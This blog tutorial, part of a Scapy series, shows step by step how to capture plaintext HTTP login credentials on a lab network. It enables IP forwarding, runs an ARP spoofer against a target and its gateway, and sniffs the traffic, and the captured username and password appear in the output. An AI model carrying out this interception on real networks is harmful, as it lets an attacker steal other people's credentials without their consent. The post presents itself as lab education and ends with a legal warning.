Get user passwords using scapy — Part 4

Hello friends, this is a part 4 of my post series about Scapy. We are not going to write any code. Just use our previously created scripts to get information from our target.
To do this I am going to use two VM on the same network. One VM with kali linux and other with Windows 10. I am using VirtualBox to create this VM’s. But any other virtualization can be used for the test.
First what we are going to is to enable packet forwarding on Linux. Other Windows host will lose internet connection.
Execute this line in terminal:
echo 1 > /proc/sys/net/ipv4/ip_forwardFor the next step, we are going to start ARP spoofer. This attack is described more in one of the previous scapy posts.
python arp_spoofing.py -t 10.0.2.4 -g 10.0.2.1
[+] Packets sent: 8^Where 10.0.2.4 — Target IP address
10.0.2.1 — Router IP address
Let’s check if target ARP table was updated
Before arp spoofing:

And after:

As you can see the router mac address was changed. Now all target packets should go through hacker host (kali linux).
To steal packets we will use packet sniffer from the previous post:
python packet_sniffer.py -i eth0And we should wait when the target will open some website to steal information. I am going to switch to windows host and try to login to some website.
And you can result of your attack in kali linux terminal:
python packet_sniffer.py -i eth0
[+] Http Request >> aavtrain.com/index.asp
[+] Possible username/passowrd user_name=target_user&password=secret+password&Submit=Submit&login=true
[+] Http Request >> aavtrain.com/index.asp
[+] Possible username/passowrd user_name=target_user&password=secret+password&Submit=Submit&login=true
Url and password provided by the user are displayed in the terminal.
ARP spoofer should be running all the while we are doing attack. Otherwise, ARP table will be restored.
Also, this attack is not going to work with https websites because traffic is encrypted.
I would not recommend using this to steal data. You can have criminal responsibility for hacking people
Check my blog — http://devopslife.xyz
Script from this posts can be found on my GitHub repository https://github.com/Infectsoldier/hacking_tools